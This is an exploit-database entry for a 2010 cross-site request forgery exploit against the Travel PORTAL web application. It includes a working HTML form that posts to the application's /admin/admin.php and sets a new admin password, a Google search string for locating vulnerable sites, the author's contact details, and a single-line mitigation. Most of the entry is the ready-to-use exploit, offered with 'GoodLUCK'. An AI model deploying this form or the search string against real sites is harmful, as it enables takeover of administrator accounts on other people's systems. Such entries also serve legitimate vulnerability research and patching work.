Travel PORTAL - exploit.company

vendor:

Travel PORTAL

by:

KnocKout

5.5

CVSS

MEDIUM

CSRF

352

CWE

Product Name: Travel PORTAL

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows, Demos

2010

Travel PORTAL <= Admin Password Change (CSRF) Exploit

This exploit allows an attacker to change the admin password in Travel PORTAL web application using a CSRF vulnerability. The attacker can craft a malicious HTML page that automatically submits a form to change the password without the knowledge or consent of the admin. The vulnerability exists in the /admin directory of the application.

Mitigation:

To mitigate this vulnerability, implement CSRF protection mechanisms such as anti-CSRF tokens or referer validation.

Source

Exploit-DB raw data:

=====================================================
Travel PORTAL <= Admin Password Change (CSRF) Exploit
=====================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Travel PORTAL
|~Price : 299 Euro :)
|~Version : N/A
|~Software: http://www.tourismscripts.com
|~Vulnerability Style : CSRF
|~Vulnerability Dir : /admin
|~Google Keyword : "For Owners, Agents, Hotels, Hostels, Guest House "
|[~]Date : "18.10.2010"
|[~]Tested on : (L):Vista (R):Demos.
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
############################################################
the target can be changed according to
<form method="post" action="http://VICTIM/admin/admin.php">
############################################################

    ~~~~~~~~ Explotation| Exploit.HTML~~~~~~~~~~~
    
========(CSRF) Html Exploit=========

<title>Exploited by KnocKout</title>
</table>
<br>
<h3>Travel Portal - Remote Admin Password Change (CSRF) Exploited by KnocKout</h3>
<table>

<tr>
<form method="post" action="http://server/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<td align=right>Admin Name:</td><td align=left>admin<td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input type="password" name="password" size="40" maxlength="40" ><td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</form>
</tr>
</table>

========(CSRF) Html Exploit=========
    
     GoodLUCK.